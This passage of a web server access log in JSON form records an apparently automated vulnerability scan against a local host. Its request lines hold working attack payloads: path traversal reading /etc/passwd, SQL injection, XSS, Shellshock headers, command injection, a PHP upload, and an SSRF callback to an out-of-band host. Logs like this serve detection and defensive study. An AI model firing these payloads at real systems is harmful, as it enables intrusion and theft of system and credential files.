+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webtools/control/main HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://c9v8hn0smpv8c57g0t00pwe4yjo7z6fkp.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/ HTTP/1.1","status":"403","body_bytes_sents":"187","req_time":"1.213","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/js/magmi_utils.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/apps/new-application HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"bsh.script=exec(\x22id\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22297MbC1ApxSKa38MU8f7GcqvUB9%22%3b%20%3f%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect-to?url=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MdtMEa1kN41nLUFYd8770mSk')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /product-downloads/297MbCnl1PhTQAU5eFYdvfSaB8R.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"------WebKitFormBoundaryoZ8meKnrrso89R6Y\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22; filename=\x22../../../../../../../tmp/poc\x22\x0D\x0A\x0D\x0Atest-poc\x0D\x0A------WebKitFormBoundaryoZ8meKnrrso89R6Y--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MdtMEa1kN41nLUFYd8770mSk')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 